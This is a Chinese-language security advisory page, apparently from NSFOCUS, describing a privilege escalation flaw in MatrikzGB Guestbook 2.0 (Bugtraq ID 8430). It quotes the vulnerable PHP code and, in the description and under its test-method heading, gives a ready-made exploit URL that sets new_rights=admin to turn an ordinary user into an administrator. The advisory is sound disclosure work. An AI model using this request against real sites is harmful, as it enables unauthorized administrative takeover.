安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
MatrikzGB Guestbook管理权限提升漏洞
发布日期:
2003-08-16
更新日期:
2003-08-21
受影响系统:
MatrikzGB Guestbook 2.0
描述:
BUGTRAQ ID:
8430
MatrikzGB Guestbook是一款基于WEB的留言本系统。
MatrikzGB Guestbook由于对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个漏洞把普通用户提升为管理员权限的用户。
此问题存在于用户的编辑功能中,任意普通用户可以更改权限或对目前存在用户的权限进行修改,问题代码如下:
if ($new_username != "" && $new_password != "") {
create_user($new_username,$new_password,$new_rights,$entry_index);
echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!";
提交类似如下的请求,可导致普通用户拥有管理员权限:
http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
<*来源:Stephan S (
mastamorphixx@web.de
)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106122349430118&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Stephan S (
mastamorphixx@web.de
)提供了如下测试方法:
http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
建议:
厂商补丁:
MatrikzGB
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.matrikz-design.de/index.php
浏览次数:
3232
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客